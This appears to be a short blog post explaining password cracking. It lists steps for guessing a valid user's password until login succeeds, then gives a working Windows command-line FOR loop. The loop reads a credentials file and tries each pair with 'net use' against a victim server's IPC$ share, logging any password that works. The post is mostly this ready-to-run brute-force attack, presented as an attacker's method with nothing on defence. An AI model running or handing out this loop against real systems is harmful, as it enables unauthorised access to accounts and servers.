-
Find a valid user
-
Create a list of possible passwords
-
Rank the passwords from high probability to low
-
Key in each password
-
If the system allows you in - Success
-
Else try till success
In its simplest form, password cracking can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated using the FOR loop. |
A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:
[file: credentials.txt] administrator ""
administrator password
administrator administrator
[Etc.]
From a directory that can access the text file the following command is typed:
c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
More? 2 >> nul^
More? && echo %time% %date% >> outfile.txt^
More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
c:\>type outfile.txt
If there has been a successfully guessed username and password from credentials.txt, outfile.txt will exist and contain the correct user name and password. The attacker's system will also have an open session with the victim server.
Amarjit Singh
No comments:
Post a Comment